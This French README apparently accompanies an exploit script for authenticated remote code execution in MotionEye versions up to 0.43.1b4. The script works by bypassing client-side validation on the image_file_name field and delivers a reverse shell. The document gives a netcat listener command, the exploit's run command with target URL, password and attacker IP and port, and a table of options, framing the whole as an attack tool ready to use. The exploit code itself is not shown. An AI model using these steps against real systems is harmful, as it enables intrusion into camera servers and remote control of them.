
Exploit RCE authentifié pour MotionEye <= 0.43.1b4 via contournement de validation côté client sur le champ image_file_name. Inclut la livraison d'un shell inversé.
RCE authentifiée dans MotionEye <= 0.43.1b4 via un contournement de la validation côté client sur le champ image_file_name.
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444
| Option | Description |
|---|---|
-t | Hôte/URL cible (port 8765 par défaut) |
-u | Nom d'utilisateur (défaut : admin) |
-p | Mot de passe - même valeur que celle saisie dans l'interface graphique / trouvée dans motion.conf |
-lh | Votre IP d'attaquant |
-lp | Port d'écoute |
--camera-id | ID de caméra (détection automatique si omis) |